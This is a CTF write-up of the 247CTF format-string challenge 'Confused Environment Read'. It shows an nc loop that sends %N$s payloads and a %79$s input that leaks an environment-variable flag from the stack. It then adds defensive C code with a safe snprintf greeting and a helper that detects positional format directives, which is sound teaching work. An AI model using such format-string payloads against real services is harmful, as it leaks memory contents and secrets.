Confused Environment Read (pwn)

PUBLISHED ON 27/02/2020 — EDITED ON 01/04/2020 — 247CTF, INFOSEC

Intro

This is my write-up of the pwnable challenge "Confused Environment Read" on the CTF site 247CTF.com.

Instructions

Can you abuse our confused environment service to read flag data hidden on the stack?

Howto

kali@kali:~$ for i in $(seq 0 100); do echo "%$i\$s" | nc b7dca240cf1fbf61.247ctf.com 50478; done

Keep interrupting the command with ^C until you hit something interesting on the stack:

/home/notroot/chall

HOSTNAME=b7dca240cf1f!
HOME=/home/notroot
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin!
PWD=/home/notroot!
FLAG=247CTF{FLAG}!

Exact value:

kali@kali:~$ nc b7dca240cf1fbf61.247ctf.com 50478
Argh, I can't see who you are!
What's your name again?
%79$s
Oh, that's right! Welcome back FLAG=247CTF{FLAG}!
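
The service's source is not shown in this write-up; a name of %79$s coming back as an environment string is what happens when user input is passed to printf as the format string. The following is an added example, not the challenge's code: the assumed vulnerable call appears as a comment, next to a hardened greeting and a hypothetical helper, scan_format, for flagging format directives in logged input.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed vulnerable pattern (the service's source is not on the page):
 *     printf(name);    // user input becomes the format string
 * A name of "%79$s" makes printf read its 79th argument slot as a char*,
 * which here lands on a pointer into the environment block. */

/* Hardened greeting: constant format string, name is only ever data. */
int greet_safe(char *out, size_t outlen, const char *name)
{
    return snprintf(out, outlen, "Oh, that's right! Welcome back %s!", name);
}

/* Hypothetical audit helper: counts printf conversions in s and stores the
 * largest positional index (the N in %N$...) in *max_pos, 0 if none. */
int scan_format(const char *s, int *max_pos)
{
    int count = 0;
    *max_pos = 0;
    while ((s = strchr(s, '%')) != NULL) {
        s++;
        if (*s == '%') { s++; continue; }      /* "%%" is a literal percent */
        count++;                               /* includes a trailing lone '%' */
        const char *p = s;
        int n = 0;
        while (isdigit((unsigned char)*p) && n < 100000)
            n = n * 10 + (*p++ - '0');
        if (p > s && *p == '$' && n > *max_pos)
            *max_pos = n;
    }
    return count;
}

int main(void)
{
    const char *name = "%79$s";                /* constructed sample input */
    char line[128];
    int max_pos;
    int hits = scan_format(name, &max_pos);
    greet_safe(line, sizeof line, name);
    printf("%s\n", line);
    printf("directives=%d max_positional=%d\n", hits, max_pos);
    return 0;
}
```

With the constant format string the input is echoed back literally; building with -Wformat -Wformat-security makes GCC and Clang warn about the commented-out pattern.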
